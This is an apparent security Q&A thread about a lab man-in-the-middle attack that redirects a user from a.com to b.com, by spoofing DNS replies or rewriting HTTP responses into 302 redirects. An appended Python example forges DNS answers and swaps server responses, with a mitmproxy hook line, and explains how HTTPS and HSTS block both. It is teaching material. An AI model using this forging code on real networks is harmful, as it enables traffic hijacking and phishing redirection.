For training purposes, I need some pointers on tools and tips for implementing an active Man-In-The-Middle attack.

The attack scenario I want to implement is a toy example (which is countered by server authentication); it is the following:

1) The user requests a.com

2) The MITM changes the user request to b.com

3) The user sees b.com in his user agent (e.g., browser)

I looked on the web. There is ARP spoofing, which seems like it will allow me to sniff users' requests but not manipulate them.

What is the easiest way to manipulate the user's requested address through a MITM attacker who does not have access to the user's device, but only the communication channel?

As I said, this question is for learning. It is also worth noting that this is detectable by modern client agents or browsers, and I do not intend to implement it in any way other than in a lab learning environment.

user9371654
  • ARP spoofing certainly allows modification of traffic. A tool like `mitmproxy` or maybe `bettercap` would be pretty quick for scripting this sort of thing up. – multithr3at3d May 06 '19 at 00:59

1 Answer

You could MITM the victim’s DNS connection. When the victim requests a name resolution for a.com, you return the address for b.com. The victim’s browser bar will still say a.com, but they will be communicating with b.com.

Or you could MITM the http stream and let the victim connect to a.com, but replace the server’s 200 response with a 302 redirect response to b.com. The victim’s browser will show b.com in the address bar.

John Deters
  • Thanks. Just one correction: I do not get how `The victim’s browser bar will still say a.com, but they will be communicating with b.com.`? I think the browser bar will show b.com, but it is the user's responsibility to identify that the URL is incorrect, which can be tricky sometimes in phishing attacks if the user interface looks like the legitimate site, a.com in this example. – user9371654 Apr 22 '19 at 10:05
  • @user9371654 No. If you MITM the DNS then the user's browser will show a.com. WHY? Look up DNS. – yeah_well Apr 22 '19 at 18:10
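The two rewrites the answer describes, worked through on constructed packets as an added example. This is not code from the question, the answer, or any tool mentioned on the page; it uses only the Python standard library. The function names, the transaction ID, the sample HTTP response and the address 203.0.113.7 standing in for b.com are all constructed for the example, and nothing is transmitted: the attacker-side logic is applied to byte strings so the effect can be checked offline.

```python
from __future__ import annotations

import struct

# --- 1. DNS: answer the victim's query for a.com with b.com's address --------

def encode_name(name: str) -> bytes:
    """Encode a dotted hostname as DNS labels: "a.com" -> b"\\x01a\\x03com\\x00"."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(lab)]) + lab.encode("ascii") for lab in labels) + b"\x00"

def decode_name(data: bytes, offset: int) -> tuple[str, int]:
    """Decode an uncompressed label sequence; return (name, offset after it)."""
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length

def build_dns_query(name: str, txid: int = 0x1234) -> bytes:
    """Constructed stand-in for the victim's lookup: one A question, RD set."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN

def forge_dns_response(query: bytes, spoofed_ip: str, ttl: int = 300) -> bytes:
    """Reply the on-path attacker sends back. Transaction ID and question are
    copied from the query, so the resolver files it as the answer for a.com;
    only the address in the A record belongs to the attacker (b.com)."""
    txid, flags, qdcount = struct.unpack("!HHH", query[:6])
    if qdcount != 1:
        raise ValueError("example handles single-question queries only")
    _, end = decode_name(query, 12)
    qtype, _qclass = struct.unpack("!HH", query[end:end + 4])
    if qtype != 1:
        raise ValueError("example answers A queries only")
    question = query[12:end + 4]
    # QR=1 (response), RD copied from the query, AA=1, RA=1, RCODE=0.
    rflags = 0x8000 | (flags & 0x0100) | 0x0400 | 0x0080
    header = struct.pack("!HHHHHH", txid, rflags, 1, 1, 0, 0)
    # Answer RR: pointer to the question name (0xC00C), A, IN, TTL, RDLENGTH=4, address.
    rdata = bytes(int(octet) for octet in spoofed_ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata
    return header + question + answer

def read_a_answer(response: bytes) -> tuple[str, str]:
    """What the victim's resolver extracts: (name asked for, address answered)."""
    name, end = decode_name(response, 12)
    rr = end + 4  # skip QTYPE/QCLASS of the echoed question
    if response[rr:rr + 2] != b"\xc0\x0c":
        raise ValueError("expected a compression pointer to the question name")
    rdlength = struct.unpack("!H", response[rr + 10:rr + 12])[0]
    rdata = response[rr + 12:rr + 12 + rdlength]
    return name, ".".join(str(b) for b in rdata)

# --- 2. HTTP: replace the real server's 200 with a 302 to b.com --------------

def rewrite_to_redirect(server_response: bytes, location: str) -> bytes:
    """Swap the genuine response for a redirect. The TCP connection really went
    to a.com, but the browser is told to fetch b.com, so the address bar changes.
    Body dropped, Content-Length 0 and Connection: close keep the framing sane."""
    head = server_response.split(b"\r\n\r\n", 1)[0]
    version = head.split(b"\r\n", 1)[0].split(b" ", 1)[0]
    if not version.startswith(b"HTTP/1."):
        raise ValueError("example rewrites HTTP/1.x responses only")
    return b"".join([
        version, b" 302 Found\r\n",
        b"Location: ", location.encode("ascii"), b"\r\n",
        b"Content-Length: 0\r\n",
        b"Connection: close\r\n\r\n",
    ])

def status_and_location(response: bytes) -> tuple[int, str | None]:
    """Parse status code and Location header roughly as a browser would."""
    lines = response.split(b"\r\n\r\n", 1)[0].split(b"\r\n")
    code = int(lines[0].split(b" ")[1])
    location = None
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        if key.strip().lower() == b"location":
            location = value.strip().decode("ascii")
    return code, location

if __name__ == "__main__":
    # Constructed sample traffic; 203.0.113.7 (TEST-NET-3) stands in for b.com.
    forged = forge_dns_response(build_dns_query("a.com"), "203.0.113.7")
    print("DNS:", read_a_answer(forged))  # ('a.com', '203.0.113.7')
    real = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 5\r\n\r\nhello"
    print(rewrite_to_redirect(real, "http://b.com/").decode())
```

Running it shows the difference between the two approaches directly: the forged DNS reply still carries a.com in its question section, which is why the browser keeps showing a.com while it connects to b.com's address, whereas the HTTP rewrite produces a 302 whose Location sends the browser to b.com and changes the address bar. On a live lab network the DNS half must reach the victim before the genuine resolver's reply (the forged reply copies the transaction ID for that reason), and the HTTP half is the same logic a mitmproxy addon would place in its `response(flow)` hook by assigning `flow.response = http.Response.make(302, b"", {"Location": "http://b.com/"})`. Both only work on plaintext, unauthenticated traffic: with HTTPS the forged a.com connection fails certificate validation, which is the server-authentication countermeasure the question mentions, and HSTS removes the plain-HTTP hop the redirect relies on.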